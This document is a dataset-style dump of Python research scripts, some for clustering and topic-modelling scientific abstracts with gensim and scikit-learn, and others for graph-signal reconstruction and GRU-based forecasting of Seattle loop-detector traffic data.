repo_name stringclasses 400 values | branch_name stringclasses 4 values | file_content stringlengths 16 72.5k | language stringclasses 1 value | num_lines int64 1 1.66k | avg_line_length float64 6 85 | max_line_length int64 9 949 | path stringlengths 5 103 | alphanum_fraction float64 0.29 0.89 | alpha_fraction float64 0.27 0.89 |
|---|---|---|---|---|---|---|---|---|---|
rafunchik/shrimps | refs/heads/master | # coding=utf-8
from __future__ import print_function
import codecs
import os
import re
from gensim import corpora, matutils
from abstract import Abstract
import numpy
__author__ = 'rcastro'
from gensim.models import LdaModel, LsiModel, HdpModel
# model = Word2Vec.load_word2vec_format("/Users/rcastro/nltk_data/word2vec_models/GoogleNews-vectors-negative300.bin", binary=True)
# print(model.most_similar('Crayfish', topn=5))
import logging
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
print("get the abstracts")
text = ''
clean_abstracts_filename = 'clean_abstracts.txt'
if not os.path.isfile(clean_abstracts_filename):
try:
with codecs.open('abstracts.txt', 'r', encoding='utf8') as abstracts_file:
text = abstracts_file.read().strip()
except IOError as e:
print('Operation failed: %s' % e.strerror)
else:
pass # serialize the clean abstracts
abstracts = [Abstract(x) for x in text.split("\r\n\r\n")]
num_abstracts = len(abstracts)
clean_abstracts = [x.text for x in abstracts]
# stops = set(stopwords.words("english"))
#
# def get_tokens_list(my_text):
# words = [w for w in nltk.word_tokenize(my_text) if not w in stops]
# return words + [' '.join(x) for x in nltk.bigrams(words)]
def remove_numeric_tokens(string):
    """Collapse numeric tokens (a digit run plus its trailing
    non-word separators) into a single space."""
    numeric_run = re.compile(r'\d+[^\w|-]+')
    return numeric_run.sub(' ', string)
# Initialize the "CountVectorizer" object, which is scikit-learn's
# bag of words tool.
# vectorizer = CountVectorizer(analyzer="word",
# tokenizer=None,
# preprocessor=remove_numeric_tokens,
# stop_words='english',
# lowercase=True,
# ngram_range=(1, 2),
# min_df=0,
# max_df=1.0, # quizas probar con 0.8 x ahi
# token_pattern=r"(?u)\b[\w][\w|-]+\b",
# max_features=155000)
# analyzer = vectorizer.build_analyzer()
#
# abstract_vectors = [analyzer(w) for w in clean_abstracts]
# TfidfTransformer() ->
#
# for i in xrange( 0, num_abstracts ):
# # If the index is evenly divisible by 1000, print a message
# if( (i+1)%1000 == 0 ):
# print "Review %d of %d\n" % ( i+1, num_abstracts )
# clean_abstracts.append( texts[i]) #review_to_words( texts[i] ))
# fit_transform() does two functions: First, it fits the model
# and learns the vocabulary; second, it transforms our training data
# into feature vectors. The input to fit_transform should be a list of
# strings.
# train_data_features = vectorizer.fit_transform(clean_abstracts)
#
# # Numpy arrays are easy to work with, so convert the result to an
# # array
# train_data_features = train_data_features.toarray()
# # Sum up the counts of each vocabulary word
# dist = np.sum(train_data_features, axis=0)
#
# # Take a look at the words in the vocabulary
# vocab = vectorizer.get_feature_names()
# For each, print the vocabulary word and the number of times it
# appears in the training set
# for tag, count in zip(vocab, dist):
# print count, tag
# print "Training the random forest..."
# from sklearn.ensemble import RandomForestClassifier
# Initialize a Random Forest classifier with 100 trees
# forest = RandomForestClassifier(n_estimators = 100)
# Fit the forest to the training set, using the bag of words as
# features and the sentiment labels as the response variable
#
# This may take a few minutes to run
# forest = forest.fit( train_data_features, train["sentiment"] )
from sklearn.feature_extraction.text import TfidfVectorizer
"""
Aqui vectorizamos el texto de los articulos usando TF/IDF quitando primero los tokens que son solo numericos,
y las stopwords en ingles.
Selecciona casi todos los unigramas y los bigramas de dos caracteres (donde el segundo caracter puede ser -) al menos
(en minusculas).
"""
vectorizer = TfidfVectorizer(analyzer="word",
tokenizer=None,
preprocessor=remove_numeric_tokens,
stop_words='english',
lowercase=True,
ngram_range=(1, 2),
min_df=1,
max_df=1.0, # se puede disminuir el umbral para ignorar terminos que aparecen en muchos docs
token_pattern=r"(?u)\b[\w][\w|-]+\b",
max_features=155000)
analyzer = vectorizer.build_analyzer()
abstract_vectors = [analyzer(w) for w in clean_abstracts]
tfidf_matrix = vectorizer.fit_transform(clean_abstracts)
terms = vectorizer.get_feature_names() # todos los terminos (unigramas y bigramas)
# dictionary = corpora.Dictionary(clean_abstracts)
#
#
# from sklearn.metrics.pairwise import cosine_similarity
#
# dist = 1 - cosine_similarity(tfidf_matrix)
from sklearn.cluster import KMeans
from sklearn.externals import joblib
num_clusters = 5 # numero predefinido de clusters, hay que probar en un rango
if not os.path.isfile('doc_cluster.pkl'): # carga del disco si lo corriste ya una vez, comentalo si lo quieres reescribir
km = KMeans(n_clusters=num_clusters) # kmeans usando cosine distance, agrupa los abstracts similares
km.fit(tfidf_matrix)
joblib.dump(km, 'doc_cluster.pkl')
else:
km = joblib.load('doc_cluster.pkl')
clusters = km.labels_.tolist()
import pandas as pd
article_titles = {'title': [x.title for x in abstracts], 'cluster': clusters}
frame = pd.DataFrame(article_titles, index=[clusters], columns=['title', 'cluster'])
print(frame['cluster'].value_counts())
print("Top terms per cluster:")
# sort cluster centers by proximity to centroid (usando cosine distance)
order_centroids = km.cluster_centers_.argsort()[:, ::-1]
for i in range(num_clusters):
print("Cluster %d words:" % i)
for ind in order_centroids[i, :7]: # replace 5 with n words per cluster
print(' %s' % terms[ind].encode('utf-8', 'ignore')) # las 7 palabras mas representativas de cada cluster
#
# print( "Cluster %d titles:" % i)
# for title in frame.ix[i]['title'].values.tolist()[:5]:
# print (' %s,' % title)
# create a Gensim dictionary from the texts
dictionary = corpora.Dictionary(abstract_vectors)
# remove extremes (similar to the min/max df step used when creating the tf-idf matrix)
dictionary.filter_extremes(no_below=1, no_above=0.8) # filtra los terminos mas comunes
#
corpus_filename = 'deerwester.mm'
if not os.path.isfile(corpus_filename):
# convert the dictionary to a bag of words corpus for reference
corpus = [dictionary.doc2bow(review) for review in abstract_vectors]
corpora.MmCorpus.serialize(corpus_filename, corpus)
else:
corpus = corpora.MmCorpus(corpus_filename)
# vamos a utilizar Latent semantic indexing para tratar categorizar los abstracts
print("lsi")
lsi_filename = 'model.lsi'
if not os.path.isfile(lsi_filename):
lsi = LsiModel(corpus, id2word=dictionary, num_topics=5) # initialize an LSI transformation, 5 topicos
#
lsi.save(lsi_filename) # same for tfidf, lda, ...
else:
lsi = LsiModel.load(lsi_filename)
lsi_topics = 5 # numero predefinido de topicos
def print_topic(lsi, topicno, topn=7):
    """Format one LSI topic as a '+'-joined string of weight*"word" terms,
    e.g. '-0.340*"category" + 0.298*"$M$" + ...'."""
    terms = show_topic(lsi, topicno, topn)
    return ' + '.join('%.3f*"%s"' % (weight, word) for word, weight in terms)
def show_topic(lsi, topicno, topn=7):
    """Return the `topn` strongest (word, weight) pairs for LSI topic
    `topicno` (the topicno-th left singular vector), unit-normalised.

    Both signs contribute to the ranking (absolute magnitude).
    Returns '' when the projection's real rank is smaller than `topicno`.
    """
    factors = lsi.projection.u.T
    # The projection can have fewer factors than num_topics (real rank of
    # the input matrix); mirror gensim and return an empty string then.
    if topicno >= len(factors):
        return ''
    weights = numpy.asarray(factors[topicno, :]).flatten()
    length = numpy.sqrt(numpy.dot(weights, weights))
    top_ids = matutils.argsort(numpy.abs(weights), topn, reverse=True)
    return [(lsi.id2word[idx], 1.0 * weights[idx] / length) for idx in top_ids]
def show_topics(num_topics=lsi_topics, num_words=7, log=True, formatted=True, lsi=None):
    """
    Return `num_topics` most significant topics of the given LSI model.

    For each topic, show `num_words` most significant words (7 by default).

    Args:
        num_topics: number of topics to return (capped at lsi.num_topics).
        num_words: words shown per topic.
        log: if True, also print each topic to stdout.
        formatted: if True, topics are formatted strings; otherwise lists
            of (word, weight) 2-tuples.
        lsi: a trained LsiModel instance (required).

    Returns:
        list of (topic_index, topic) pairs.
    """
    if lsi is None:
        raise ValueError("an LsiModel instance must be supplied via `lsi`")
    shown = []
    # bug fix: `xrange` is Python-2-only; `range` behaves identically here.
    for i in range(min(num_topics, lsi.num_topics)):
        if i < len(lsi.projection.s):
            if formatted:
                topic = print_topic(lsi, i, topn=num_words)
            else:
                topic = lsi.show_topic(i, topn=num_words)
            shown.append((i, topic))
            if log:
                # bug fix: the format string was handed to print() as a plain
                # first argument (printing a raw tuple-style line) instead of
                # being interpolated with its values.
                print("topic #%i(%.3f): %s" % (i, lsi.projection.s[i], topic))
    return shown
show_topics(lsi=lsi) # imprime los topicos (categorias)
# try with BoW vectors too?
# vamos a utilizar Latent Dirichlet Allocation para tratar de categorizar los abstracts
# este se demora la primera q lo corres para entrenar el modelo
print("lda")
lda_filename = 'model.lda'
if not os.path.isfile(lda_filename):
lda = LdaModel(corpus, num_topics=5,
id2word=dictionary,
update_every=5,
chunksize=10000,
passes=100)
lda.save('/tmp/model.lda')
else:
lda = LdaModel.load('/tmp/model.lda')
lda.show_topics()
topics_matrix = lda.show_topics(formatted=False, num_words=7)
print(topics_matrix)
print(len(topics_matrix))
for topic in topics_matrix:
i = topic[1]
print([str(word) for word in i])
#
# topics_matrix = np.array(topics_matrix)
#
# topic_words = topics_matrix[:, :, 1]
# for i in topic_words:
# print([str(word) for word in i])
# otro modelo mas para categorizar documentos, Hierarchical Dirichlet Process
print("HDP")
model = HdpModel(corpus, id2word=dictionary)
model.show_topics(log=True, topics=5)
# ver https://radimrehurek.com/gensim/tut2.html
| Python | 310 | 33.645161 | 131 | /docs.py | 0.648138 | 0.635475 |
rafunchik/shrimps | refs/heads/master | # coding=utf-8
import os
import re
import numpy as np
from abstract import Abstract
__author__ = 'rcastro'
from gensim.models import Doc2Vec
from gensim.models.doc2vec import TaggedLineDocument, TaggedDocument
from codecs import open
def remove_numeric_tokens(string):
    """Strip numeric tokens (digits followed by separator characters)
    from `string`, leaving a single space in their place."""
    cleaned = re.sub(r'\d+[^\w|-]+', ' ', string)
    return cleaned
# Convert text to lower-case and strip punctuation/symbols from words
def normalize_text(text):
    """Lower-case `text` and pad common punctuation marks with a space on
    both sides, so each mark becomes its own token."""
    padded = text.lower()
    for mark in ('.', '"', ',', '!', '?', ';', ':'):
        padded = padded.replace(mark, ' %s ' % mark)
    return padded
sentences_keywords = []
docs_filename = 'abstracts_preprocesados.txt'
if not os.path.isfile(docs_filename):
print "get the abstracts"
text = ''
try:
with open('abstracts.txt', 'r', encoding='utf8') as abstracts_file:
text = abstracts_file.read().strip()
except IOError as e:
print 'no pudo leer los abstracts: %s' % e.strerror
abstracts = [Abstract(x) for x in text.split("\r\n\r\n")]
for article in abstracts:
sentences_keywords.append([normalize_text(remove_numeric_tokens(x)).strip() for x in article.keywords])
with open(docs_filename, 'w', encoding='utf8') as f:
for idx, line in enumerate([normalize_text(remove_numeric_tokens(x.text)) for x in abstracts]):
f.write(line + '\n')
# # num_line = "_*{0} {1}\n".format(idx, line)
# # f.write(line+'\n')
sentences = TaggedLineDocument('abstracts_preprocesados.txt')
# sentences = sentences_keywords
# Vamos a utilizar Doc2vec, ver http://rare-technologies.com/doc2vec-tutorial/
from gensim.models import Doc2Vec
import gensim.models.doc2vec
from collections import OrderedDict
import multiprocessing
cores = multiprocessing.cpu_count()
assert gensim.models.doc2vec.FAST_VERSION > -1, "this will be painfully slow otherwise"
# Set values for various parameters
num_features = 400 # Word vector dimensionality
# min_word_count = 1 # Minimum word count
# context = 20 # Context window size
# downsampling = 1e-3 # Downsample setting for frequent words
# 3 modelos diferentes con veectores de 50 variables
simple_models = [
# PV-DM w/concatenation - window=10 (both sides) approximates paper's 10-word total window size
Doc2Vec(dm=1, dm_concat=1, size=50, window=10, negative=10, hs=0, min_count=2, workers=cores),
# PV-DBOW
Doc2Vec(dm=0, size=50, negative=5, hs=0, min_count=2, workers=cores),
# PV-DM w/average
Doc2Vec(dm=1, dm_mean=1, size=50, window=10, negative=5, hs=0, min_count=2, workers=cores),
]
# 3 modelos diferentes con veectores de 400 variables
simple_models_400 = [
# PV-DM w/concatenation - window=5 (both sides) approximates paper's 10-word total window size
Doc2Vec(dm=1, dm_concat=1, size=num_features, window=10, negative=10, hs=0, min_count=2, workers=cores),
# PV-DBOW
Doc2Vec(dm=0, size=num_features, negative=5, hs=0, min_count=2, workers=cores),
# PV-DM w/average
Doc2Vec(dm=1, dm_mean=1, size=num_features, window=10, negative=5, hs=0, min_count=2, workers=cores),
]
# speed setup by sharing results of 1st model's vocabulary scan
simple_models[0].build_vocab(sentences) # PV-DM/concat requires one special NULL word so it serves as template
print(simple_models[0])
for model in simple_models[1:]:
model.reset_from(simple_models[0])
print(model)
for model in simple_models_400:
model.reset_from(simple_models[0])
print(model)
all_models = simple_models+simple_models_400
models_by_name = OrderedDict((str(model), model) for model in all_models)
'''
Following the paper, we also evaluate models in pairs. These wrappers return the concatenation of the vectors from each model. (Only the singular models are trained.)
In [5]:
from gensim.test.test_doc2vec import ConcatenatedDoc2Vec
models_by_name['dbow+dmm'] = ConcatenatedDoc2Vec([simple_models[1], simple_models[2]])
models_by_name['dbow+dmc'] = ConcatenatedDoc2Vec([simple_models[1], simple_models[0]])
'''
from random import shuffle
import datetime
# for timing
from contextlib import contextmanager
from timeit import default_timer
import random
@contextmanager
def elapsed_timer():
    """Yield a zero-argument callable returning the seconds elapsed so far;
    once the with-block exits, the callable returns the frozen total."""
    start = default_timer()
    elapser = lambda: default_timer() - start
    # The yielded lambda indirects through `elapser`, so rebinding `elapser`
    # below freezes the reported duration after the block finishes.
    yield lambda: elapser()
    end = default_timer()
    elapser = lambda: end-start
passes = 20
print("START %s" % datetime.datetime.now())
all_docs = []
for doc in sentences:
all_docs.append(doc)
for epoch in range(passes):
shuffle(all_docs) # shuffling gets best results
# doc_id = np.random.randint(len(sentences)) #
doc_id = np.random.randint(simple_models[0].docvecs.count) # pick random doc, (escoge un abstract aleatorio y busca los mas simijantes)
for name, model in models_by_name.items()[:3]:
with elapsed_timer() as elapsed:
model.train(all_docs)
# duration = '%.1f' % elapsed()
# print (name, duration)
sims = model.docvecs.most_similar(doc_id, topn=model.docvecs.count) # get *all* similar documents
print(u'ABSTRACTS mas similares por modelo %s:\n' % model)
print(u'abstract escogido: «%s»\n' % (' '.join(all_docs[doc_id].words)))
print(u'y sus keywords: «%s»\n' % (' '.join(sentences_keywords[doc_id])))
for label, index in [('MOST', 0)]: #, ('MEDIAN', len(sims)//2), ('LEAST', len(sims) - 1)]:
print(u'%s %s: «%s»\n' % (label, sims[index][1], ' '.join(all_docs[sims[index][0]].words)))
print(u'Keywords de los docs similares: «%s»\n' % (' '.join(sentences_keywords[sims[index][0]])))
word_models = all_models[:3]
# while True:
# word = random.choice(word_models[0].index2word)
# if word_models[0].vocab[word].count > 10 and len(word)>3:
# break
# aqui puedes sustituir por una palabra, y ver que palabras similares te salen de acuerdo a los modelos...
word = "aquaculture" #diadromous
similars_per_model = [str(model.most_similar(word, topn=5)).replace('), ','),<br>\n') for model in word_models]
similar_table = ("<table><tr><th>" +
"</th><th>".join([str(model) for model in word_models]) +
"</th></tr><tr><td>" +
"</td><td>".join(similars_per_model) +
"</td></tr></table>")
print("most similar words for '%s' (%d occurences)" % (word, simple_models[0].vocab[word].count))
print(similar_table)
#TODO import wiki model and add to word_models
| Python | 175 | 36.965714 | 166 | /doc2vec.py | 0.671433 | 0.651565 |
gabilew/Joint-Forecasting-and-Interpolation-of-GS | refs/heads/master | import torch
import torch.nn as nn
import numpy as np
from torch.autograd import Variable
import scipy
from sklearn.metrics.pairwise import rbf_kernel
def complement(S, N):
    """Return (as a numpy array) the indices in {0, ..., N-1} not in S."""
    full_set = set(range(N))
    return np.array(list(full_set - set(S)))
class Reconstruction(nn.Module):
    # Fixed (non-trainable) GSP reconstruction layer: lifts signals known on
    # a sampled node subset back to all N vertices via a precomputed
    # interpolation matrix.
    def __init__(self,V, sample, freqs, domain='vertex',use_original_set = False, device = 'cuda'):
        """
        GSP reconstruction of graph signals.

        Args:
            V (numpy array): eigenvector matrix of Laplacian or adjacency.
                This matrix is expected to be orthonormal.
            sample (list-like): list of indices of in-sample nodes.
            freqs (list-like): indices of the retained spectral components.
            domain (str, optional): domain of the incoming signal; 'vertex'
                expects sampled vertex values, 'spectral' expects GFT
                coefficients. Defaults to 'vertex'.
            use_original_set (bool, optional): if True, keep the sample
                indices on the module as `self.sample`. Defaults to False.
            device (str, optional): device holding the interpolation matrix.
        """
        super(Reconstruction, self).__init__()
        assert(domain in ['vertex','spectral'])
        if domain == 'vertex':
            interp = Interpolator(V, sample, freqs)
        elif domain == 'spectral':
            # freq=True makes Interpolator return the spectral-domain
            # pseudo-inverse instead of the vertex-domain one.
            interp= Interpolator(V, sample, freqs, freq=True)
        self.Interp = torch.Tensor(interp).to(device)
        self.N = V.shape[0]
        if use_original_set:
            self.sample = sample
        else:
            self.sample = None
    def forward(self,x):
        # x: (batch, seq, nodes) or (batch, nodes); returns the signal
        # lifted to all self.N nodes.
        x0 = x  # NOTE(review): unused — presumably left over from debugging.
        n_dim = len(x.size())
        if n_dim == 3:
            bz, seq_len, n = x.size()
            # NOTE(review): Tensor.T on a 3-D tensor reverses *all* dims
            # (deprecated in recent torch); this code relies on that.
            x = x.T
            x = x.reshape((n, bz*seq_len))
            x = torch.matmul(self.Interp,x)
            x = x.reshape((self.N,seq_len,bz)).T
        else:
            bz, n = x.size()
            x = x.T
            x = x.reshape((n, bz))
            x = torch.matmul(self.Interp,x)
            x = x.reshape((self.N,bz)).T
        return x
def corrMatrix(A, x):
    """Reweight adjacency matrix `A` with RBF-kernel similarities of `x`.

    Args:
        A (2D numpy array): adjacency matrix.
        x (2D numpy array): signals (time x nodes) used for the kernel.

    Returns:
        2D numpy array: adjacency normalised by its largest eigenvalue,
        with a zeroed diagonal.
    """
    similarity = rbf_kernel(x.T / 10)
    weighted = similarity * A
    eigvals, _ = np.linalg.eigh(weighted)
    weighted = weighted / np.max(eigvals)
    return weighted - np.diag(weighted.diagonal())
def spectral_components(A, x, return_vectors = True,lap = True, norm = False):
    """Rank spectral components by their aggregate magnitude in `x`.

    Args:
        A (2d numpy array): adjacency matrix.
        x (2d numpy array): graph signals, time in rows, nodes in columns.
        return_vectors (bool, optional): also return the eigenvector matrix.
        lap (bool, optional): use the Laplacian (True) or the adjacency.
        norm (bool, optional): symmetrically normalise as D^{-1/2} A D^{-1/2}.

    Returns:
        F_global (np array): component indices sorted by decreasing score,
        and the eigenvector matrix V when `return_vectors` is True.
    """
    num_nodes = A.shape[0]
    if norm:
        d_inv_sqrt = np.diag(1 / np.sqrt(A.sum(axis=1)))
        normalized = d_inv_sqrt @ A @ d_inv_sqrt
        operator = np.diag(np.ones(num_nodes)) - normalized if lap else normalized
    elif lap:
        operator = np.diag(A.sum(axis=1)) - A
    else:
        operator = A
    _, V = np.linalg.eigh(operator)
    # Per-time-step spectral magnitudes: rows are time, columns components.
    magnitudes = np.abs(V.T @ x.T).T
    # Accumulate, per component, its rank position within each time step.
    scores = {comp: 0 for comp in range(x.shape[1])}
    for row in magnitudes:
        for rank, comp in enumerate(np.argsort(row)):
            scores[comp] += rank
    F_global = np.argsort([scores[comp] for comp in scores])[::-1]
    if return_vectors:
        return F_global, V
    return F_global
def Interpolator(V, sample, freqs, freq = False):
    """Build the least-squares interpolation matrix that reconstructs a
    bandlimited graph signal from its values on `sample`.

    Args:
        V (2D numpy array): orthonormal eigenvector matrix (N x N).
        sample (list-like): indices of the sampled (in-sample) nodes.
        freqs (list-like): indices of the retained spectral components.
        freq (bool, optional): if True, return the spectral-domain
            pseudo-inverse (V_f times the inverse Gram matrix) instead of
            the vertex-domain interpolator. Defaults to False.

    Returns:
        2D numpy array interpolation matrix, or None when the sampling set
        is not admissible for this frequency support.
    """
    Vf = V[:, freqs]
    n = Vf.shape[0]
    psi_diag = np.zeros(n)
    psi_diag[sample] = 1  # transpose of the sampling operator \Psi
    Psi = np.diag(psi_diag)
    # Check admissibility *before* inverting: if sigma_max((I - Psi) Vf)
    # reaches 1, the Gram matrix below is (numerically) singular and the
    # sample cannot uniquely determine the bandlimited signal.
    Psi_bar = np.identity(n) - Psi
    s = np.linalg.svd(np.dot(Psi_bar, Vf), compute_uv=False)
    if np.max(s) > 1:
        # bug fix: message typo ("Samling ... admissable")
        print("Sampling is not admissible")
        return None
    inv = scipy.linalg.inv(Vf.T @ Psi @ Vf)
    pseudoi = inv if freq else inv @ Vf.T @ Psi[:, sample]
    return np.dot(Vf, pseudoi)
class KNN(nn.Module):
    """One-hop neighbour-mean imputation baseline.

    Unknown (out-of-sample) nodes are first filled with the global mean of
    the in-sample training signal, then replaced by the mean of their graph
    neighbours' current values.
    """

    def __init__(self, A, sample, matrix):
        """
        Args:
            A (2D numpy array): adjacency matrix.
            sample (list-like): indices of observed (in-sample) nodes.
            matrix (pandas DataFrame): training signals (time x nodes) used
                to derive the fill value for unobserved nodes.
        """
        super(KNN, self).__init__()
        N = A.shape[0]
        # bug fix: forward() previously read `A` from an undefined global
        # name; keep the adjacency on the module instance instead.
        self.A = A
        # setdiff1d gives the same complement set as the module-level
        # `complement` helper, with a deterministic (sorted) order.
        self.unknown = np.setdiff1d(np.arange(N), sample)
        self.mask = np.mean(matrix.values[:, sample])

    def forward(self, input):
        # Fill every unknown node with the training mean. The ellipsis
        # indexes the trailing node axis uniformly for 2-D (batch, nodes),
        # 3-D and 4-D inputs (the original repeated this per rank and then
        # crashed on 2-D input in the loop below).
        input[..., self.unknown] = self.mask
        x = input
        for node in self.unknown:
            neighbors = np.nonzero(self.A[node])[0]
            # bug fix: keepdim=True so the (…, 1)-shaped mean broadcasts
            # into the advanced-indexed (…, 1) assignment target.
            x[..., [node]] = torch.mean(x[..., neighbors], dim=-1, keepdim=True)
        return x
def greedy_e_opt(Uf, S):
    """
    code from https://github.com/georgosgeorgos/GraphSignalProcessing, please refer to this repository
    MIT License
    Copyright (c) 2018 Giorgio Giannone
    Permission is hereby granted, free of charge, to any person obtaining a copy
    of this software and associated documentation files (the "Software"), to deal
    in the Software without restriction, including without limitation the rights
    to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
    copies of the Software, and to permit persons to whom the Software is
    furnished to do so, subject to the following conditions:
    The above copyright notice and this permission notice shall be included in all
    copies or substantial portions of the Software.
    THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
    IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
    FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
    AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
    LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
    OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
    SOFTWARE.
    greedy_e_opt: sample S nodes from a set of size N where N is the number of rows in matrix Uf
    Args:
        Uf (2D numpy array): truncated eigenvector matrix with N rows. Columns correspond to the selected eigenvectors
        S (int): sample size
    Returns:
        sample: list of indices of selected nodes
    """
    index_set = set()
    sample=[]
    n = Uf.shape[0] - 1  # highest candidate node index
    k = 0  # greedy rounds completed (kept for parity with the source repo)
    I = np.diag(np.ones(Uf.shape[0]))
    # E-optimal greedy design: in each round, add the node whose inclusion
    # minimises the largest singular value of (I - Ds) Uf.
    while len(index_set) < S:
        i = -1
        i_best = -1
        old_list = []
        sigma_best = np.inf
        while i < n:
            i = i + 1
            if i in index_set:
                continue  # node already selected
            else:
                Ds_list = np.zeros(Uf.shape[0])
                ix = sample + [i]
                Ds_list[ix] = 1
                Ds = np.diag(Ds_list)  # candidate sampling operator
                Ds_bar = I - Ds
                DU = np.dot(Ds_bar, Uf)
                s = np.linalg.svd(DU, compute_uv=False)
                sigma_max = max(s)
                if sigma_max < sigma_best and sigma_max != -np.inf:
                    sigma_best = sigma_max
                    i_best = i
        k = k + 1
        index_set.add(i_best)
        sample.append(i_best)
    return sample
| Python | 256 | 29.402344 | 133 | /pytorch_gsp/utils/gsp.py | 0.561866 | 0.555313 |
gabilew/Joint-Forecasting-and-Interpolation-of-GS | refs/heads/master | import math
import sys
import time
import numpy as np
import pandas as pd
from sklearn.metrics.pairwise import rbf_kernel
def USA_data(directory):
    """Load the USA temperature graph signals and their kNN adjacency matrix.

    TODO: include the GSOD dataset.
    """
    signals = pd.read_csv(directory + 'Usa_temp.csv')
    # Drop the index column pandas may have round-tripped into the CSV.
    if "Unnamed: 0" in signals.columns:
        signals = signals.drop(columns="Unnamed: 0")
    adjacency = np.load(directory + 'Adjk10_07-13.npy')
    return signals, adjacency
def Seattle_data(directory , binary=False):
    """
    Seattle_data: load the Seattle loop-detector dataset, see
    https://github.com/zhiyongc/Graph_Convolutional_LSTM/blob/master/Code_V2/HGC_LSTM%20%26%20Experiments.ipynb
    Args:
        directory (str): directory of the Seattle loop detector dataset
        binary (bool, optional): if True, keep the binary adjacency; if
            False, reweight it with an RBF kernel computed from the first
            1000 time steps and normalise by the largest eigenvalue.
            Defaults to False.
    Returns:
        speed_matrix: graph signals with time in the rows and nodes in the columns
        A: adjacency matrix
        FFR: free flow reachability matrices (5 to 25 minute horizons)
    """
    speed_matrix = pd.read_pickle( directory + 'speed_matrix_2015',)
    A = np.load( directory + 'Loop_Seattle_2015_A.npy')
    if not binary:
        # RBF similarity from the first 1000 time steps, masked by the
        # binary adjacency, then spectrally normalised, zero diagonal.
        cor = rbf_kernel(speed_matrix[:1000].T/10)
        A = cor*(A)
        e, V = np.linalg.eigh(A)
        A/=np.max(e)
        A = A-np.diag(A.diagonal())
    FFR_5min = np.load( directory + 'Loop_Seattle_2015_reachability_free_flow_5min.npy')
    FFR_10min = np.load( directory + 'Loop_Seattle_2015_reachability_free_flow_10min.npy')
    FFR_15min = np.load( directory + 'Loop_Seattle_2015_reachability_free_flow_15min.npy')
    FFR_20min = np.load( directory + 'Loop_Seattle_2015_reachability_free_flow_20min.npy')
    FFR_25min = np.load( directory + 'Loop_Seattle_2015_reachability_free_flow_25min.npy')
    FFR = [FFR_5min, FFR_10min, FFR_15min, FFR_20min, FFR_25min]
    return speed_matrix, A, FFR
| Python | 52 | 35.01923 | 111 | /data/Load_data.py | 0.657797 | 0.61735 |
gabilew/Joint-Forecasting-and-Interpolation-of-GS | refs/heads/master | import os
import time
import torch
import argparse
import numpy as np
import pandas as pd
import time
from data.Load_data import Seattle_data
from data.Dataloader import *
from pytorch_gsp.train.train_rnn import Evaluate, Train
from pytorch_gsp.utils.gsp import ( greedy_e_opt, spectral_components)
from pytorch_gsp.models.sggru import *
def n_params(model):
    """Total number of scalar parameters in a torch model."""
    return np.sum([param.numel() for param in model.parameters()])
print(torch.__version__)
def training_routine(args):
    """Build the dataloaders, train the SG-GRU model on the Seattle loop
    dataset, evaluate it, and persist the model plus its losses.

    Args:
        args: parsed command-line namespace (see the argparse definition).
    """
    # bug fix: torch.cuda.is_available is a function — without the call the
    # bound method is always truthy and the cpu fallback never triggered.
    device = 'cuda' if torch.cuda.is_available() else 'cpu'
    if args.device == 'cuda' and device == 'cpu':
        print("cuda is not available, device set to cpu")
    else:
        assert args.device in ['cpu', 'cuda']
        device = args.device
    lr = args.lr
    epochs = args.epochs
    seq_len = args.seq_len
    pred_len = args.pred_len
    patience = args.patience
    name = args.save_name
    # put the Seattle Loop dataset in this directory
    speed_matrix, A, FFR = Seattle_data('data/Seattle_Loop_Dataset/')
    N = speed_matrix.shape[1]
    S = int(args.sample_perc * N / 100)
    if args.F_perc is None:
        F = int(S / 3)
    else:
        F = int(args.F_perc * N / 100)
    assert S > F  # the sampling set must be larger than the spectral support
    # Graph Fourier basis and component ranking from the first 1000 steps.
    F_list, V = spectral_components(A, np.array(speed_matrix)[:1000])
    if args.supervised:
        freqs = F_list[:F]
    else:
        freqs = np.arange(0, F, 1)
    if args.e_opt:
        print("Using e-optimal greedy algorithm")
        if args.sample_perc == 25:
            sample = np.load('data/Seattle_Loop_Dataset/sample_opt25.npy')[0]
        elif args.sample_perc == 50:
            sample = np.load('data/Seattle_Loop_Dataset/sample_opt50.npy')[0]
        elif args.sample_perc == 75:
            sample = np.load('data/Seattle_Loop_Dataset/sample_opt75.npy')[0]
        else:
            # bug fix: `Fs` was undefined (NameError); the greedy sampler
            # needs the eigenvectors restricted to the retained frequencies.
            sample = greedy_e_opt(V[:, freqs], S)
    else:
        sample = np.sort(np.random.choice(np.arange(N), S, replace=False))
    S = len(sample)
    pre_time = time.time()
    train, valid, test, max_value = SplitData(speed_matrix.values, label=None, seq_len=10,
                                              pred_len=1, train_proportion=0.7,
                                              valid_proportion=0.2, shuffle=False)
    pipeline = DataPipeline(sample, V, freqs, seq_len, pred_len)
    train_dataloader = pipeline.fit(train)
    valid_dataloader = pipeline.transform(valid)
    test_dataloader = pipeline.transform(test, sample_label=False,
                                         batch_size=test.shape[0] - seq_len - pred_len,
                                         shuffle=False)
    print("Preprocessing time:", time.time() - pre_time)
    layer = SpectralGraphForecast(V, sample, freqs, rnn='gru')
    sggru = model(V, sample, freqs, layer, l1=0, l2=0.0,
                  supervised=bool(args.supervised)).to(device)
    pre_time = time.time()
    print("Total number of nodes: {}".format(N))
    print("Sample size: {}".format(S))
    print("Spectral sample size: {}".format(F))
    print("Initial learning rate: {}".format(lr))
    sggru, sggru_loss = Train(sggru, train_dataloader, valid_dataloader, epochs=epochs,
                              learning_rate=lr, patience=patience, sample=sample)
    print("Training time:", time.time() - pre_time)
    pre_time = time.time()
    sggru_test = Evaluate(sggru.to(device), test_dataloader, max_value)
    print("Test time:", time.time() - pre_time)
    # NOTE(review): the CLI --save-name is overridden here, so artifacts are
    # always written as 'sggru.*' — confirm whether that is intended.
    name = 'sggru'
    loss = (sggru_loss, sggru_test)
    os.makedirs("models_and_losses/", exist_ok=True)
    torch.save(sggru, "models_and_losses/{}.pt".format(name))
    np.save("models_and_losses/{}.npy".format(name), loss)
